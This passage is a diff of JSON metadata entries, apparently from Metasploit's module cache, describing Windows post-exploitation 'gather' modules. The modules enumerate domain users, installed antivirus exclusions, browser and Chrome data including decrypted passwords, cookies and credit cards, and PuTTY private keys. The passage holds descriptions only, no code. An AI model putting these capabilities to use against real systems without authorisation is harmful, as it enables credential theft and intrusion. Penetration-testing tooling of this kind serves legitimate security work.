database. If GROUP_MEMBER is set to the DN of a group, this will list the members of\n that group by performing a recursive/nested search (i.e. it will list users who are members of\n groups that are members of groups that are members of groups (etc) which eventually include the\n target group DN.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_users.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_users", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_applications": { + "name": "Windows Gather Installed Application Enumeration", + "fullname": "post/windows/gather/enum_applications", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will enumerate all installed applications on a Windows system", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_applications.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_applications", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_artifacts": { + "name": "Windows Gather File and Registry Artifacts Enumeration", + "fullname": "post/windows/gather/enum_artifacts", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "averagesecurityguy " + ], + "description": "This module will check the file system and registry for particular artifacts.\n\n The list of artifacts is read in YAML format from data/post/enum_artifacts_list.txt\n or a user specified file. Any matches are written to the loot.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-08-07 16:01:45 +0000", + "path": "/modules/post/windows/gather/enum_artifacts.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_artifacts", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "powershell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_av": { + "name": "Windows Installed AntiVirus Enumeration", + "fullname": "post/windows/gather/enum_av", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "rageltman " + ], + "description": "This module will enumerate the AV products detected by WMIC", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-04-21 11:35:33 +0000", + "path": "/modules/post/windows/gather/enum_av.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_av", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_av_excluded": { + "name": "Windows Antivirus Exclusions Enumeration", + "fullname": "post/windows/gather/enum_av_excluded", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Andrew Smith", + "Jon Hart " + ], + "description": "This module will enumerate the file, directory, process and\n extension-based exclusions from supported AV products, which\n currently includes Microsoft Defender, Microsoft Security\n Essentials/Antimalware, and Symantec Endpoint Protection.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_av_excluded.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_av_excluded", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_browsers": { + "name": "Advanced Browser Data Extraction for Chromium and Gecko Browsers", + "fullname": "post/windows/gather/enum_browsers", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Alexander \"xaitax\" Hagenah" + ], + "description": "This post-exploitation module extracts sensitive browser data from both Chromium-based and Gecko-based browsers\n on the target system. It supports the decryption of passwords and cookies using Windows Data Protection API (DPAPI)\n and can extract additional data such as browsing history, keyword search history, download history, autofill data,\n credit card information, browser cache and installed extensions.", + "references": [], + "platform": "Windows", + "arch": "x64, x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-30 15:43:02 +0000", + "path": "/modules/post/windows/gather/enum_browsers.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_browsers", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_chocolatey_applications": { + "name": "Windows Gather Installed Application Within Chocolatey Enumeration", + "fullname": "post/windows/gather/enum_chocolatey_applications", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nick Cottrell " + ], + "description": "This module will enumerate all installed applications on a Windows system with chocolatey installed", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-04-01 10:56:11 +0000", + "path": "/modules/post/windows/gather/enum_chocolatey_applications.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_chocolatey_applications", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_chrome": { + "name": "Windows Gather Google Chrome User Data Enumeration", + "fullname": "post/windows/gather/enum_chrome", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sven Taute", + "sinn3r ", + "Kx499", + "mubix " + ], + "description": "This module will collect user data from Google Chrome and attempt to decrypt\n sensitive information.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_chrome.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_chrome", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_computers": { + "name": "Windows Gather Enumerate Computers", + "fullname": "post/windows/gather/enum_computers", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joshua Abraham " + ], + "description": "This module will enumerate computers included in the primary Active Directory domain.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-10-12 10:59:29 +0000", + "path": "/modules/post/windows/gather/enum_computers.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_computers", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_db": { + "name": "Windows Gather Database Instance Enumeration", + "fullname": "post/windows/gather/enum_db", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Barry Shteiman ", + "juan vazquez " + ], + "description": "This module will enumerate a Windows system for installed database instances.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_db.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_db", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_devices": { + "name": "Windows Gather Hardware Enumeration", + "fullname": "post/windows/gather/enum_devices", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Brandon Perry " + ], + "description": "Enumerate PCI hardware information from the registry. Please note this script\n will run through registry subkeys such as: 'PCI', 'ACPI', 'ACPI_HAL', 'FDC', 'HID',\n 'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW',\n and 'USB'; it will take time to finish. It is recommended to run this module as a\n background job.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_devices.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_devices", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_dirperms": { + "name": "Windows Gather Directory Permissions Enumeration", + "fullname": "post/windows/gather/enum_dirperms", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kx499", + "Ben Campbell ", + "sinn3r " + ], + "description": "This module enumerates directories and lists the permissions set\n on found directories. Please note: if the PATH option isn't specified,\n then the module will start enumerate whatever is in the target machine's\n %PATH% variable.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_dirperms.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_dirperms", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_domain": { + "name": "Windows Gather Enumerate Domain", + "fullname": "post/windows/gather/enum_domain", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joshua Abraham " + ], + "description": "This module identifies the primary Active Directory domain name\n and domain controller.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-08 13:35:22 +0000", + "path": "/modules/post/windows/gather/enum_domain.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_domain", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_domain_group_users": { + "name": "Windows Gather Enumerate Domain Group", + "fullname": "post/windows/gather/enum_domain_group_users", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "Stephen Haywood " + ], + "description": "This module extracts user accounts from the specified domain group\n and stores the results in the loot. It will also verify if session\n account is in the group. Data is stored in loot in a format that\n is compatible with the token_hunter plugin. This module must be\n run on a session running as a domain user.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-22 17:05:19 +0000", + "path": "/modules/post/windows/gather/enum_domain_group_users.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_domain_group_users", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_domain_tokens": { + "name": "Windows Gather Enumerate Domain Tokens", + "fullname": "post/windows/gather/enum_domain_tokens", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module enumerates domain account tokens, processes running under\n domain accounts, and domain users in the local Administrators, Users\n and Backup Operator groups.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-10 13:54:39 +0000", + "path": "/modules/post/windows/gather/enum_domain_tokens.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_domain_tokens", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_domain_users": { + "name": "Windows Gather Enumerate Active Domain Users", + "fullname": "post/windows/gather/enum_domain_users", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Etienne Stalmans ", + "Ben Campbell " + ], + "description": "This module will enumerate computers included in the primary Domain and attempt\n to list all locations the targeted user has sessions on. If the HOST option is specified\n the module will target only that host. If the HOST is specified and USER is set to nil, all users\n logged into that host will be returned.'", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_domain_users.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_domain_users", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_domains": { + "name": "Windows Gather Domain Enumeration", + "fullname": "post/windows/gather/enum_domains", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module enumerates currently the domains a host can see and the domain\n controllers for each domain.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_domains.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_domains", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_emet": { + "name": "Windows Gather EMET Protected Paths", + "fullname": "post/windows/gather/enum_emet", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vysec " + ], + "description": "This module will enumerate the EMET protected paths on the target host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_emet.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_emet", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_files": { + "name": "Windows Gather Generic File Collection", + "fullname": "post/windows/gather/enum_files", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "3vi1john ", + "RageLtMan " + ], + "description": "This module downloads files recursively based on the FILE_GLOBS option.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_files.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_files", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_hostfile": { + "name": "Windows Gather Windows Host File Enumeration", + "fullname": "post/windows/gather/enum_hostfile", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vt " + ], + "description": "This module returns a list of entries in the target system's hosts file.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_hostfile.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_hostfile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_hyperv_vms": { + "name": "Windows Hyper-V VM Enumeration", + "fullname": "post/windows/gather/enum_hyperv_vms", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "gwillcox-r7" + ], + "description": "This module will check if the target machine is a Hyper-V host and, if it is, will return a list of all\n of the VMs running on the host, as well as stats such as their state, version, CPU Usage, uptime, and status.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/post/windows/gather/enum_hyperv_vms.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_hyperv_vms", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ie": { + "name": "Windows Gather Internet Explorer User Data Enumeration", + "fullname": "post/windows/gather/enum_ie", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kx499" + ], + "description": "This module will collect history, cookies, and credentials (from either HTTP\n auth passwords, or saved form passwords found in auto-complete) in\n Internet Explorer. The ability to gather credentials is only supported\n for versions of IE >=7, while history and cookies can be extracted for all\n versions.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ie.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ie", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_logged_on_users": { + "name": "Windows Gather Logged On User Enumeration (Registry)", + "fullname": "post/windows/gather/enum_logged_on_users", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will enumerate current and recently logged on Windows users.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-08-08 01:50:36 +0000", + "path": "/modules/post/windows/gather/enum_logged_on_users.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_logged_on_users", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "powershell", + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ms_product_keys": { + "name": "Windows Gather Product Key", + "fullname": "post/windows/gather/enum_ms_product_keys", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Brandon Perry " + ], + "description": "This module will enumerate Microsoft product license keys.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-08-21 16:00:27 +0000", + "path": "/modules/post/windows/gather/enum_ms_product_keys.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ms_product_keys", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_muicache": { + "name": "Windows Gather Enum User MUICache", + "fullname": "post/windows/gather/enum_muicache", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "TJ Glad " + ], + "description": "This module gathers information about the files and file paths that logged on users have\n executed on the system. It also will check if the file still exists on the system. This\n information is gathered by using information stored under the MUICache registry key. If\n the user is logged in when the module is executed it will collect the MUICache entries\n by accessing the registry directly. If the user is not logged in the module will download\n users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are\n parsed from the downloaded hive.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_muicache.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_muicache", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_onedrive": { + "name": "OneDrive Sync Provider Enumeration Module", + "fullname": "post/windows/gather/enum_onedrive", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will identify the Office 365 OneDrive endpoints for both business and personal accounts\n across all users (providing access is permitted). It is useful for identifying document libraries\n that may otherwise not be obvious which could contain sensitive or useful information.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/post/windows/gather/enum_onedrive.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_onedrive", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_patches": { + "name": "Windows Gather Applied Patches", + "fullname": "post/windows/gather/enum_patches", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "zeroSteiner ", + "mubix " + ], + "description": "This module enumerates patches applied to a Windows system using the\n WMI query: SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering.", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/aa394391(v=vs.85).aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-23 17:41:20 +0000", + "path": "/modules/post/windows/gather/enum_patches.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_patches", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_powershell_env": { + "name": "Windows Gather PowerShell Environment Setting Enumeration", + "fullname": "post/windows/gather/enum_powershell_env", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will enumerate Microsoft PowerShell settings.", + "references": [ + "URL-https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies", + "URL-https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-08-01 00:56:21 +0000", + "path": "/modules/post/windows/gather/enum_powershell_env.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_powershell_env", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_prefetch": { + "name": "Windows Gather Prefetch File Information", + "fullname": "post/windows/gather/enum_prefetch", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "TJ Glad " + ], + "description": "This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems\n and current values of related registry keys. From each prefetch file we'll collect\n filetime (converted to utc) of the last execution, file path hash, run count, filename\n and the execution path.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_prefetch.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_prefetch", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_proxy": { + "name": "Windows Gather Proxy Setting", + "fullname": "post/windows/gather/enum_proxy", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module pulls a user's proxy settings. If neither RHOST or SID\n are set it pulls the current user, else it will pull the user's settings\n for the specified SID and target host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-12-04 15:10:47 +0000", + "path": "/modules/post/windows/gather/enum_proxy.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_proxy", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_putty_saved_sessions": { + "name": "PuTTY Saved Sessions Enumeration Module", + "fullname": "post/windows/gather/enum_putty_saved_sessions", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session\n information from the registry. PuTTY is very configurable; some users may have configured\n saved sessions which could include a username, private key file to use when authenticating,\n host name etc. If a private key is configured, an attempt will be made to download and store\n it in loot. It will also record the SSH host keys which have been stored. These will be connections that\n the user has previously after accepting the host SSH fingerprint and therefore are of particular\n interest if they are within scope of a penetration test.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_putty_saved_sessions.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_putty_saved_sessions", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_services": { + "name": "Windows Gather Service Info Enumeration", + "fullname": "post/windows/gather/enum_services", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Keith Faber", + "Kx499" + ], + "description": "This module will query the system for services and display name and\n configuration info for each returned service. It allows you to\n optionally search the credentials, path, or start type for a string\n and only return the results that match. These query operations are\n cumulative and if no query strings are specified, it just returns all\n services. NOTE: If the script hangs, windows firewall is most likely\n on and you did not migrate to a safe process (explorer.exe for\n example).", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-09 17:27:19 +0000", + "path": "/modules/post/windows/gather/enum_services.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_services", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_shares": { + "name": "Windows Gather SMB Share Enumeration via Registry", + "fullname": "post/windows/gather/enum_shares", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will enumerate configured and recently used file shares.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-02 17:34:32 +0000", + "path": "/modules/post/windows/gather/enum_shares.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_shares", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "powershell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_snmp": { + "name": "Windows Gather SNMP Settings", + "fullname": "post/windows/gather/enum_snmp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez 